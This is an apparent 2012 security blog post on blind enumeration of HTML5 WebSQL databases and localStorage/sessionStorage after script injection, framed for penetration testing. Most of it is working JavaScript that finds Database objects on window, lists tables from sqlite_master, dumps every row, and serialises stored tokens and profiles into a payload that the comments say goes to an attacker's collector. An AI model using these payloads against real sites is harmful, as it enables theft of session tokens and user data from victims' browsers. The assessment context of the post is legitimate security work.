
Saturday, January 07, 2012

Blind WebSQL and Storage extraction for HTML5 Apps

HTML5 brings two important client-side data stores: WebSQL and Web
Storage (localStorage and sessionStorage). Both are defined by W3C specifications and
both are accessed from JavaScript. Even once we have a foothold in the DOM (script
injection of some kind), we are still completely blind to the WebSQL table names and
the storage keys. Here is a way to enumerate that data during pen-testing and assessments.

Blind WebSQL Enumeration

We need the following information to extract the target content:

1. The Database object

2. The table structure created in SQLite

3. The user table on which we need to run the SELECT query

Here is a script that harvests the database object and the table list with
zero prior knowledge:

var dbo;
var table;
var usertable;

// Walk every enumerable property of window looking for a WebSQL Database object.
for (var i in window) {
  var obj = window[i];
  try {
    if (obj.constructor.name == "Database") {
      dbo = obj;
      // Read the table list from sqlite_master, SQLite's catalogue table.
      obj.transaction(function (tx) {
        tx.executeSql('SELECT name FROM sqlite_master WHERE type=\'table\'', [],
          function (tx, results) {
            table = results;
            // executeSql is asynchronous, so the table name must be picked
            // inside this callback. Row 0 is WebKit's own bookkeeping table
            // (__WebKitDatabaseInfoTable__); the first user table is row 1.
            if (table.rows.length > 1)
              usertable = table.rows.item(1).name;
          }, null);
      });
    }
  } catch (ex) {}
}

a.) We loop over every property of window and keep the object whose
constructor is "Database".

b.) We run a SELECT directly against sqlite_master, the SQLite catalogue
table that lists every table in the database.

c.) We grab the table at index 1, leaving the WebKit bookkeeping table at
index 0.

We now have the name of a real application table residing in WebSQL; next we
can run a SELECT against it and loop through the results.

Since we still hold the database object, the same transaction/executeSql calls run that query from the script.

Hence the script can be part of a payload during testing to fetch the
data remotely.
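The three steps above, carried through to the row dump, as an added example that is not the original post's script: the WebSQL callback API is wrapped in Promises so the sqlite_master lookup finishes before its result is used, and the whole payload returns a JSON-ready object. The class `Database` in the block is a constructed stand-in for the browser's WebSQL object (it answers only the two query shapes used here) so the example runs under Node; in a browser you would call harvest(window) and post the result to your collector.

```javascript
// Added example, not the original post's script. `Database`, `sampleWindow`
// and the sample rows are constructed so this runs under Node.

// WebKit keeps its own bookkeeping table in every WebSQL database.
const WEBKIT_INFO_TABLE = '__WebKitDatabaseInfoTable__';

// Promise wrapper around db.transaction() / tx.executeSql(), the real WebSQL shape.
function query(db, sql, args = []) {
  return new Promise((resolve, reject) => {
    db.transaction(tx => {
      tx.executeSql(sql, args,
        (t, results) => resolve(results),
        (t, err) => { reject(new Error(err.message)); return true; });
    });
  });
}

// Step a: walk the enumerable properties of the root object (window in a
// browser) and keep every object whose constructor is named "Database".
function findDatabases(root) {
  const found = [];
  for (const name in root) {
    let obj;
    try { obj = root[name]; } catch (e) { continue; } // some window getters throw
    if (obj && obj.constructor && obj.constructor.name === 'Database') found.push(obj);
  }
  return found;
}

// Step b: list user tables from sqlite_master, dropping the WebKit table.
async function listUserTables(db) {
  const res = await query(db, "SELECT name FROM sqlite_master WHERE type='table'");
  const names = [];
  for (let i = 0; i < res.rows.length; i++) names.push(res.rows.item(i).name);
  return names.filter(n => n !== WEBKIT_INFO_TABLE);
}

// Step c: dump every row of a discovered table. The name came from
// sqlite_master, but it is still quoted as an identifier.
async function dumpTable(db, table) {
  const res = await query(db, `SELECT * FROM "${table.replace(/"/g, '""')}"`);
  const rows = [];
  for (let i = 0; i < res.rows.length; i++) rows.push(res.rows.item(i));
  return rows;
}

// Whole payload: databases -> tables -> rows, as { table: [rows] }.
async function harvest(root) {
  const out = {};
  for (const db of findDatabases(root)) {
    for (const t of await listUserTables(db)) out[t] = await dumpTable(db, t);
  }
  return out;
}

// Constructed stand-in for the browser's Database object. Results arrive
// asynchronously, as in the real API, which is why a synchronous check of
// the result right after transaction() would see undefined.
class Database {
  constructor(tables) { this.tables = tables; } // { tableName: [row objects] }
  transaction(fn) {
    const tx = {
      executeSql: (sql, args, onOk, onErr) => {
        queueMicrotask(() => {
          let rows;
          const m = /^SELECT \* FROM "([^"]+)"$/.exec(sql);
          if (/FROM sqlite_master/.test(sql)) {
            rows = [WEBKIT_INFO_TABLE, ...Object.keys(this.tables)].map(name => ({ name }));
          } else if (m && Object.prototype.hasOwnProperty.call(this.tables, m[1])) {
            rows = this.tables[m[1]];
          } else {
            onErr(tx, { message: 'no such table: ' + sql });
            return;
          }
          onOk(tx, { rows: { length: rows.length, item: i => rows[i] } });
        });
      }
    };
    fn(tx);
  }
}

// Constructed sample "window": one WebSQL database left on a global, as an
// app that does `var db = openDatabase(...)` would leave it.
const sampleWindow = {
  title: 'demo app',
  db: new Database({
    users: [{ id: 1, user: 'alice', token: 'tok-a1b2' }, { id: 2, user: 'bob', token: 'tok-c3d4' }]
  })
};

harvest(sampleWindow).then(r => console.log(JSON.stringify(r)));
```

Databases reachable only from closures or IndexedDB are not found by the window walk; only objects the application left on a global are, which matches the original script's scope.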

Blind Storage Enumeration

Storage enumeration is relatively easy: check the length of localStorage or
sessionStorage and, if it is not zero, loop over the keys by index and read every
value. We can use the following code for localStorage.
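An enumeration of both storage scopes through the standard Storage interface (length, key(i), getItem(k)), as an added example that is not the original post's code. The class `FakeStorage` is a constructed stand-in implementing those three members so the example runs under Node; in a browser pass window.localStorage and window.sessionStorage to dumpBoth().

```javascript
// Added example, not the original post's code. `FakeStorage` and the sample
// entries are constructed so this runs under Node, which has no window.

// Many apps store JSON-encoded objects; decode a value when it parses as
// JSON, otherwise keep the raw string (note: numeric-looking strings become numbers).
function decodeValue(v) {
  try { return JSON.parse(v); } catch (e) { return v; }
}

// Check the length first; zero means nothing is persisted for this origin.
// The spec does not fix the order key(i) returns, so always walk by index.
function dumpStorage(store) {
  const out = {};
  if (!store || store.length === 0) return out;
  for (let i = 0; i < store.length; i++) {
    const k = store.key(i);
    out[k] = decodeValue(store.getItem(k));
  }
  return out;
}

// Both scopes in one JSON payload, ready to send to a collector.
function dumpBoth(local, session) {
  return JSON.stringify({ local: dumpStorage(local), session: dumpStorage(session) });
}

// Constructed Storage-like object exposing length, key(i) and getItem(k).
class FakeStorage {
  constructor(entries) { this.map = new Map(Object.entries(entries)); }
  get length() { return this.map.size; }
  key(i) { return i < this.map.size ? [...this.map.keys()][i] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
}

// Constructed sample data: a session token and a JSON-serialised profile.
const sampleLocal = new FakeStorage({
  authToken: 'tok-12345',
  profile: '{"user":"alice","role":"admin"}'
});
const sampleSession = new FakeStorage({});

console.log(dumpBoth(sampleLocal, sampleSession));
```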